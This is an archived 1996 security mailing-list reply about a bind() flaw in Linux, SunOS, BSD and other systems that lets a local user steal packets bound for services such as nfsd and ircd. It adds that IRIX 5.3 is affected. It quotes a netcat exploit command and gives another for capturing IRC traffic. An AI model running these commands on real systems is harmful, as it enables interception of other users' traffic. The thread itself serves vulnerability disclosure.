Re: BoS: bind() Security Problems

Bernd Lehle (Bernd.Lehle@RUS.Uni-Stuttgart.DE)
Wed, 31 Jan 1996 13:18:29 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: *Hobbit*: "Aiiiieeee!!"
Previous message: Anthony C. Zboralski: "Re: XFree86 3.1.2 Security Problems"
In reply to: Aleph's K-Rad GECOS Field: "bind() Security Problems"
Next in thread: Darren Reed: "Re: BoS: bind() Security Problems"

>
>
>               System Call: bind()
>   Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
>                            Probably others.
>               Requirement: account on system.
>       Security Compromise: Stealing packets from
>                            nfsd, yppasswd, ircd, etc.
>                   Credits: *Hobbit* <hobbit@avian.org>
>                            bitblt <bitblt@infosoc.com>
>                            Aleph One <aleph1@underground.org>
>                  Synopsis: bind() does not properly check
>                            to make sure there is not a socket
>                            already bound to INADDR_ANY on the same
>                            port when binding to a specific address.
>

IRIX 5.3 is vulnerable, too.

> Exploit:
[..]
> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...

To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667

--
> Bernd Lehle - Stuttgart University Computer Center * A supercomputer <
>       Visualization / SFB 382 / Astrophysics       *  is a machine   <
> lehle@rus.uni-stuttgart.de   Tel:+49-711-685-5531  *  that runs an   <
>   http://www.tat.physik.uni-tuebingen.de/~lehle    *  endless loop   <
>  pgp? -> finger bernd@visbl.rus.uni-stuttgart.de   *  in 2 seconds   <

Next message: *Hobbit*: "Aiiiieeee!!"
Previous message: Anthony C. Zboralski: "Re: XFree86 3.1.2 Security Problems"
In reply to: Aleph's K-Rad GECOS Field: "bind() Security Problems"
Next in thread: Darren Reed: "Re: BoS: bind() Security Problems"